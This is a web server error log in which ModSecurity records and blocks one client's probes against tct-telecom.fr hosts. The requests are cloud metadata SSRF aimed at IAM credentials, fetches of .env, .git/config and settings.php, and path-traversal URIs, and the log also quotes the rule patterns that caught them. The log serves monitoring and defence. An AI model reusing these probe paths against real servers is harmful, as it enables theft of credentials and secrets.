[Mon May 11 15:23:08.707771 2026] [security2:error] [pid 1319998:tid 1320010] [client 195.178.110.133:46020] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYPKt2WtvoFr7xvGzUQAAAAIo"]
[Mon May 11 15:23:08.741801 2026] [security2:error] [pid 1319998:tid 1320010] [client 195.178.110.133:46020] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYPKt2WtvoFr7xvGzURAAAAIo"]
[Mon May 11 15:23:08.742403 2026] [security2:error] [pid 1319998:tid 1320010] [client 195.178.110.133:46020] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYPKt2WtvoFr7xvGzURAAAAIo"]
[Mon May 11 15:23:08.742584 2026] [security2:error] [pid 1319998:tid 1320010] [client 195.178.110.133:46020] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYPKt2WtvoFr7xvGzURAAAAIo"]
[Mon May 11 15:23:08.757559 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPOJEyNRN152ArOSMqwAAAFU"]
[Mon May 11 15:23:08.757689 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPOJEyNRN152ArOSMqwAAAFU"]
[Mon May 11 15:23:08.757871 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPOJEyNRN152ArOSMqwAAAFU"]
[Mon May 11 15:23:08.759347 2026] [security2:error] [pid 1319998:tid 1320009] [client 195.178.110.133:46102] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYPKt2WtvoFr7xvGzURQAAAIk"]
[Mon May 11 15:23:08.759916 2026] [security2:error] [pid 1319998:tid 1320009] [client 195.178.110.133:46102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYPKt2WtvoFr7xvGzURQAAAIk"]
[Mon May 11 15:23:08.760104 2026] [security2:error] [pid 1319998:tid 1320009] [client 195.178.110.133:46102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYPKt2WtvoFr7xvGzURQAAAIk"]
[Mon May 11 15:23:08.776807 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYPOJEyNRN152ArOSMrAAAAFU"]
[Mon May 11 15:23:08.776936 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYPOJEyNRN152ArOSMrAAAAFU"]
[Mon May 11 15:23:08.777117 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYPOJEyNRN152ArOSMrAAAAFU"]
[Mon May 11 15:23:08.798337 2026] [security2:error] [pid 1319885:tid 1319900] [client 195.178.110.133:46012] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPFchVQ3tCn0m9OpZCQAAAQk"]
[Mon May 11 15:23:08.798452 2026] [security2:error] [pid 1319885:tid 1319900] [client 195.178.110.133:46012] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPFchVQ3tCn0m9OpZCQAAAQk"]
[Mon May 11 15:23:08.798629 2026] [security2:error] [pid 1319885:tid 1319900] [client 195.178.110.133:46012] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPFchVQ3tCn0m9OpZCQAAAQk"]
[Mon May 11 15:23:08.817823 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPOJEyNRN152ArOSMrwAAAFU"]
[Mon May 11 15:23:08.817945 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPOJEyNRN152ArOSMrwAAAFU"]
[Mon May 11 15:23:08.818145 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPOJEyNRN152ArOSMrwAAAFU"]
[Mon May 11 15:23:08.836936 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYPOJEyNRN152ArOSMsAAAAFU"]
[Mon May 11 15:23:08.837049 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYPOJEyNRN152ArOSMsAAAAFU"]
[Mon May 11 15:23:08.837231 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYPOJEyNRN152ArOSMsAAAAFU"]
[Mon May 11 15:23:08.856188 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYPOJEyNRN152ArOSMsQAAAFU"]
[Mon May 11 15:23:08.856304 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYPOJEyNRN152ArOSMsQAAAFU"]
[Mon May 11 15:23:08.856478 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYPOJEyNRN152ArOSMsQAAAFU"]
[Mon May 11 15:23:09.327594 2026] [security2:error] [pid 1320674:tid 1320706] [client 195.178.110.133:2652] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYPaO9RdIr1DwxYR2SngAAANE"]
[Mon May 11 15:23:09.327602 2026] [access_compat:error] [pid 1319953:tid 1319957] [client 195.178.110.133:2500] AH01797: client denied by server configuration: /home/tcttelec/crm.tct-telecom.fr/storage/.env
[Mon May 11 15:23:09.327644 2026] [security2:error] [pid 1319998:tid 1320001] [client 195.178.110.133:2642] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYPat2WtvoFr7xvGzUTQAAAIE"]
[Mon May 11 15:23:09.327789 2026] [security2:error] [pid 1320674:tid 1320706] [client 195.178.110.133:2652] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYPaO9RdIr1DwxYR2SngAAANE"]
[Mon May 11 15:23:09.327804 2026] [security2:error] [pid 1319998:tid 1320001] [client 195.178.110.133:2642] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYPat2WtvoFr7xvGzUTQAAAIE"]
[Mon May 11 15:23:09.328120 2026] [core:error] [pid 1319886:tid 1319901] [client 195.178.110.133:2496] AH10244: invalid URI path (/storage/../../../.env)
[Mon May 11 15:23:09.328267 2026] [security2:error] [pid 1320674:tid 1320706] [client 195.178.110.133:2652] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYPaO9RdIr1DwxYR2SngAAANE"]
[Mon May 11 15:23:09.328518 2026] [security2:error] [pid 1319998:tid 1320001] [client 195.178.110.133:2642] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYPat2WtvoFr7xvGzUTQAAAIE"]
[Mon May 11 15:23:09.329244 2026] [security2:error] [pid 1320398:tid 1320414] [client 195.178.110.133:2624] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPeJEyNRN152ArOSMtAAAAE4"]
[Mon May 11 15:23:09.329317 2026] [security2:error] [pid 1320398:tid 1320414] [client 195.178.110.133:2624] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPeJEyNRN152ArOSMtAAAAE4"]
[Mon May 11 15:23:09.329433 2026] [security2:error] [pid 1320398:tid 1320414] [client 195.178.110.133:2624] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPeJEyNRN152ArOSMtAAAAE4"]
[Mon May 11 15:23:09.329938 2026] [security2:error] [pid 1320398:tid 1320401] [client 195.178.110.133:2588] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYPeJEyNRN152ArOSMtQAAAEE"]
[Mon May 11 15:23:09.330057 2026] [security2:error] [pid 1320398:tid 1320401] [client 195.178.110.133:2588] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYPeJEyNRN152ArOSMtQAAAEE"]
[Mon May 11 15:23:09.330268 2026] [security2:error] [pid 1320398:tid 1320401] [client 195.178.110.133:2588] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYPeJEyNRN152ArOSMtQAAAEE"]
[Mon May 11 15:23:09.330735 2026] [security2:error] [pid 1320398:tid 1320414] [client 195.178.110.133:2624] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPeJEyNRN152ArOSMtAAAAE4"]
